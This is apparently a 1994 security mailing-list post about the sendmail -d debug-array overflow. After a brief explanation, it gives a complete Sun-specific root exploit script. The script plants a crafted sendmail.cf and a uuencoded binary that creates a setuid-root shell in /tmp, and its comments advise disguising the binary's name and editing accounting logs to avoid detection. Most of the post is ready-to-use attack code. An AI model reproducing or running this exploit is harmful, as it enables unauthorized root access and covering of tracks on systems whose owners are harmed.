Re: Latest sendmail bug?

[widnerm () hsd utc com (Michael R. Widner)]

In a previous message, Doug McLaren said:
> | > Does anyone have an exploit script we can use to test yet?
> | > The worst bug exploits sendmail -d and can be used to gain root
> | > according to CERT.
> | 
> | an exploit script was posted to this list a few months back.
>
> Um, I checked and never found said script.

The last sendmail -d hole script was posted somewhere back around March I
believe.  I've seen several different varieties, each of which has it's
strong points and weaknesses as an exploit script.  The important thing to
know is that if your sendmail crashes when you pass it something like
-d387654321 then it can most likely be expoited to gain root access.

Without going into much detail, -dx.y writes y into the debug array as
array[x]=y.  Range checking is not performed properly on x, so it's possible
to pass negative integers that pass the range check.  Find a key location
before the debug array, over write it, and you're in business.

The problem in trying to create a generic script is that the 'key' locations
have different offsets from the debug array for every version of sendmail.
Sometimes they're easy to locate if you can get a core, but sometimes it is
tough to get a core w/o already being root.  Also, sometimes a core tells
you nothing.

The following script is Sun specific, and patches are now available for
all versions of Sun sendmail.  The script creates a suid root owned copy
of /bin/sh and places it in /tmp.  If you're hacking solaris, I'd suggest
you choose some program other than /bin/sh.

For the curious and paranoid, the uuencoded script is a compiled, compressed,
and uuencoded version of the following c prog, compiled under sunos.
main()
{ setuid(0); chown("/tmp/newsh", 0, 0); chmod("/tmp/newsh", 04755);
        exit(0); }

I put it in this way because solaris lacks a bundled compiler.

Of course, I may be lying.  It may really be a uuencoded program that does
main() { unlink("/");}, but you'll just have to trust me.

I should point out that Sun sendmail is in no way unique in it's vulnerability
to this hole.

It's also worth noting, for Solaris administrators and hackers, that the
normal Solaris patch procedure will leave the old (pre-patched) versions of
sendmail in their broken and SUID state under /var/sadm/patch.  This should
be fixed, if you haven't done it already.

--
Michael R. Widner    <widnerm () hsd utc com>

---------------------------
#!/bin/sh
# This script takes advantage of sendmail's (mis)interpretation of
# very large unsigned ints as signed ints when accessing the debug
# array.  As it, it will work with the 8 versions of sun sendmail
# that I have access to.  Perhaps I'll update it if I find new
# versions of sun sendmail.
# NOTE:  This is a Sun specific script.  Don't expect it to work with
#        any non-sun sendmail.
# -Michael R. Widner (atreus)        3/25/94
#
# usage:  smdhole [/path/to/suid/sendmail]
#

# add /usr/ucb to path so solaris can find `whoami` (4/18/94)
path=$path:/usr/ucb

if [ $1x = x ]; then
        sendmail=/usr/lib/sendmail
else
        echo "Trying to abuse $1."
        sendmail=$1
fi

sm_size=`echo \`ls -l $sendmail\` | cut -d" " -f4,5 | sed "s/[^0-9]//g`

# prefix and suffix for -1 as unsigned integer.  Actually, this is
# off by two.  you figure out why.
prefix=42949
suffix=67297

case $sm_size in
        132064)
                n1=${prefix}52864
                n2=${prefix}52865
                n3=${prefix}52866
                echo Patched solaris w/o mx.
                ;;
        134752) # ug! dropped a 0 before.  fixed 4/18/94
                n1=${prefix}01656
                n2=${prefix}01657
                n3=${prefix}01658
                echo Patched solaris sendmail.mx
                ;;
        130860)
                n1=${prefix}53016
                n2=${prefix}53017
                n3=${prefix}53018
                echo Un-patched solaris w/o mx.
                ;;
        133548) # ug! dropped a 0 before.  fixed 4/18/94
                n1=${prefix}01808
                n2=${prefix}01809
                n3=${prefix}01810
                echo Un-patched solaris sendmail.mx
                ;;
        139264)
                n1=${prefix}49609
                n2=${prefix}49610
                n3=${prefix}49611
                echo Sun 4.1.3 sendmail - could be either of two versions
                n4=${prefix}49265
                n5=${prefix}49266
                n6=${prefix}49267
                ;;
        155648)
                n1=${prefix}46953
                n2=${prefix}46954
                n3=${prefix}46955
                echo Sun 4.1.3 sendmail.mx - could be either of two versions
                n4=${prefix}46609
                n5=${prefix}46610
                n6=${prefix}46611
                ;;
        *)
                echo "I don't know what version of sendmail $sendmail is."
                echo -n "Look for other versions of sendmail[.mx] on the "
                echo "system and re-run this as:"
                echo "     $0 /path/to/another/suid/sendmail"
                echo
                echo "Let me see if I can suggest anything..."
                find /usr/lib /var/sadm/patch -name "*sendm*" -perm -4001 -ls 2>/dev/null
                exit 1
                ;;
        esac

cat << EOM > /tmp/sendmail.cf
DMether
DRlocalhost
CRlocalhost
CDMailer-Daemon root daemon uucp
DlFrom \$g  \$d
Do.:%@!^=/[]
Dq\$g\$?x (\$x)\$.
De\$j nothing
OA./aliases
OF0666
Og1
OL0
Oo
OPPostmaster
OQ.
Os
Ou1
T root daemon uucp

H?F?From: nobody

Mlocal, P=/tmp/in.telnet, F=flsSDFMmnP, S=10, R=20, A=mail -d \$u
Mprog,  P=/tmp/in.telnet,   F=lsDFMeuP,  S=10, R=20, A=sh -c \$u

S0
R\$+                    \$#local \$:\$1                 just rewrite
EOM

cat $0 | sed "s:atreus::" | uudecode
uncompress /tmp/in.telnet.Z
chmod 755 /tmp/in.telnet

mkdir /tmp/mail
cp /tmp/sendmail.cf /tmp/mail

cp /bin/sh /tmp/newsh
chmod 666 /tmp/newsh

$sendmail -d${n1}.116,${n2}.109,${n3}.112 `whoami`  <<EOF

test
EOF

if [ -x /tmp/newsh ]; then
        echo "Had the right offset for sendmail.cf.  Here's the result:"
else
        echo "Looks like I had the wrong sendmail.cf offset.  Fuckers."
        if [ ${n4}x = x ]; then
                echo "This version isn't what I thought it was."
                echo "Look for other suid sendmails and try this on them."
        else
                echo "I'm taking another stab with a different offset."
$sendmail -d${n4}.116,${n5}.109,${n6}.112 `whoami` <<EOF

test
EOF
                echo "Here's the result:"
        fi
fi

rm /tmp/in.telnet
rm -r /tmp/mail
rm /tmp/sendmail.cf
ls -l /tmp/newsh

exit

# I'm calling this in.telnet for one reason.  It shows up in the acct logs
# as being run by root.  It will attract less attention if it's something
# normally run by root.  An alert admin will catch is anyway, because
# in.telnet is normally not associated with a tty.  The obvious fix, if you
# want to go undetected, would be to modify the acct files once you've
# become root.
begin 775 /tmp/in.telnet.Z
M'YV0@08$6    (B"!A$J5 CBX,*"O" <A#8 %!!)%8E44@%" "4!H A\!*+@atreus
M0D$(U$2  S:@( )A ,0@  0)0  !@  0"( 02$$%/ OZ1+"S9T%'G$:  C%4atreus
MH%&B00%T&O<+S0N7KBJ(0Q'!)20)(ACX!+!$DD0 K"  0( 1%)>Q2RA)! %(atreus
M5$,).9]$%38!E!= H,(LP$LV*KJ*8(15)".N(AI2!6Q*(@ HPM6U6<4A@716atreus
M+H@"%QQ:D@!. ":U%L;2T'36E%H$D 0 H"!ML><#H0N.!B?A-(#4!5>PGGT9atreus
M068Z7==^%;%A[ BS!U6]5@P*#4V;. $L*)YY,P%@$LP"B' [-X#=O=56&'N!atreus
M]4'J<$(""V!.*1]U2@&Q4TJHY5J8,@FC%"+^00 3&, (" HC_B$@" 1@D*$@atreus
M))R!$, GQ!0$'1^!' ,. H&@<U).!CSX&00Y$6#B$2@"((") T0"S4$*I!A5atreus
M(,-\&%6% DA2 #@$4%, , "82(",!U7XAXD!(&G4"W7,(<<+;*0A!I5DN##'atreus
M&P"\0$89=KR@1QER</E0!F/(00<,.H#@QAL@0"DEE59BJ>4;"CP$@ EIKMFFatreus
MG%-6>24;66X)0AMAP %'&FZ< 8(98:3!1AURE)'G0A3TR::;<'H)IIADXKG0atreus
M"W2T <<+;I1QQQQH%#35+Y",%40(+OET@!X5 @ )!2)  AT MN;AF:Z\Q@K atreus
M 7F8E4([MJZ1:X<?AOC0JY DAY( ((!3UR__$-: )!)D"XT 8%!FEXLY)3"Latreus
M)>02\*LD[8X+Q )U'20!M_U\!$H DDB24W8*6"M*N."$H@(8 D!#P'B?P&03atreus
M0J 0\@,_,N"K\'C0@BBB5%15>Y(TV')3%QCH I  *.%R<S$ #1<4$@@$K%POatreus
M /?^LT]4R<$&%CBV(O%KQM)R#.L$)XT+!C,S$T9 A0'\\<\_YT CPM% ;_P0atreus
M$&P41( E3_^3(;!X%)0 UT_3(A0A!15 ]C^L"%43  VLO3$0G!2TP-K8"(7*atreus
M3VLS(Y39 #BP-A,(^0>  0BI51#1!36 $ 4(1>7X0Y$5)%M!!R"TL$L(50[ atreus
MI8<CE !"F1?D $((($20V @Q@!#HBFN'T .M(Y1<X'K2_M#M$B#4^T.,8ZHGatreus
M )$=P$A!)R!!>N8&A"-4WJ:/7H#?P%H]060%G&Z00P!DP-, 8NA9 D\&B*,Gatreus
M"Y$-X$=!(M1=D R9%R"'4$06M$/F!^0@E$)%? ^*GDO@R0% IQ I") %>LI"atreus
M9 A@BH*,@!0("0-/B**G-)"/#GJ20^9,(Q1H((00HSM ')Z'D$F,3@#3$ HXatreus
M$"**R!@@#P[$ D)JX<)$L&^%!4%&_/X'+&1\H0QT* ,>,/A#,H2!#F$ P _=atreus
M0 8 S &):G(B%.GP!3.PX0U'5.(/\9 &(B**44HL@QOLD(8RN4&+1,B"$X+0atreus
MA"0,(8Q<).(8T-"&-S3Q"W-\PQW.^(4^?I&/<P!B'=)PQS>X88M=U*(0N_@%atreus
M,M2A#6W(0R/+,(:L]?$+0Z#"$Z3P!28D80I4Z*,6OT $37+2DZ 4Y27)\(8Oatreus
MG.&*8@@#&_!(AS?(80ZC9*4K82G+1M;REHJ,8R,?&<DO5,H,PWM!&<I ACG8atreus
M84ID2,,<UC #*KUA#+*DTY7.,(8QM$!0+Y@#',(@!V_.H0YN:,$YWS0'&K@@atreus
M!BZHI@Q<4(-XZD"9S'0F-*5)36MBDPW:'-X!Z**0"6).<0<004XB]Y Q ( ,atreus
M61N>1"=*T8I:]*(8S:A&-\K1CGKTHR -J4A'2M*2FO2D*$VI2E?*TI:Z]*4Patreus
MC:E,9TK3FMKTICC-J4YWRM.>^O2G0 VJ4(=*U*(:]:A(3:I2E\K4ICKUJ5"-atreus
MJE2G2M6J6O6J6,VJ5K?*U:YZ]:M@#:M8QTK6LIKUK&A-JUK7RM:VNO6M<(VKatreus
M7.=*U[K:]:YXS>M2_0,$UP&+!"<MW>'V!BPN"(5D !B !W4"6)U0;R&5*P Ratreus
M$()#[@$ L3XQ7"" 0;*HO H43OL'/SQ+%= ^+1]!"<!G0VN/H A@M4^;1U &atreus
M -M_P",H!*AM.X)2@-JJ(RB(DR@0%JO7XAKWN,A-KG*7R]SF.O>YT(VN=*=+atreus
MW>I:][K8S:YVM\O=[GKWN^ -KWC'2][RFO>\Z$VO>M?+WO:Z][WPC:]\YTO?atreus
+^MKWOOC-KW[WFUS=atreus
 atreus
endatreus